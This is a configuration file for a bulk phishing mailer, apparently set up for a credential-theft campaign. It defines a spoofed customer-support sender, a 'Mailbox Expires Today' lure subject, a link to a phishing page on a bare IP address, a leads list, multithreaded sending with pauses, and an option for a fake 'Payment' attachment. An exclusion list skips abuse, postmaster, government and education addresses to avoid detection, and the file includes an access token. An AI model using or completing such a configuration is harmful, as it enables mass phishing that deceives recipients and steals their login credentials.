[TOKEN]
token : qBj4x2DjVmkGmlD

[SMTP]
loadsmtp : False
smtpserv :  {mx}
port : 25
username : 
password : 
fromemail : 
secure : False
authy : False
priority : LOW

[SEND INFO]
name : {comapnyname} - Service client (SupportClient{comapnyname})
subject : Reminder: Mailbox Expires Today | RE: [{hexemail}]
fromemail : {email}

link : http://34.125.88.117/brand/brand.php


[OPTION]
UsePause : True
PauseForSecs : 20
AfterSendEmail : 150
UseGoogle : 0
delay : 10
thread : 50
leads : leads.txt
mstype : html
useredirect : 0
403domain : http://linkfro.com
ignoreemail : True
igtype : Exclude
ignlist : abuse donotreply .ac.uk example rediffmail.com test webmaster postmaster .gov lcisd oxfarm altayer.com ifes school .in .edu example@ test webmaster demon mailer mailer-daemon @yahoo noreply no-reply postmaster customercare customer @hotmail. @live. 

[DOC OPTION]
usedoc : False
docname : Payment#{number200}.xhtml
doctit : 'REIG Asset Management' First Capital Call
doctype : HTML
autohtml : False
hide_html_code : False
creationdelay : 5
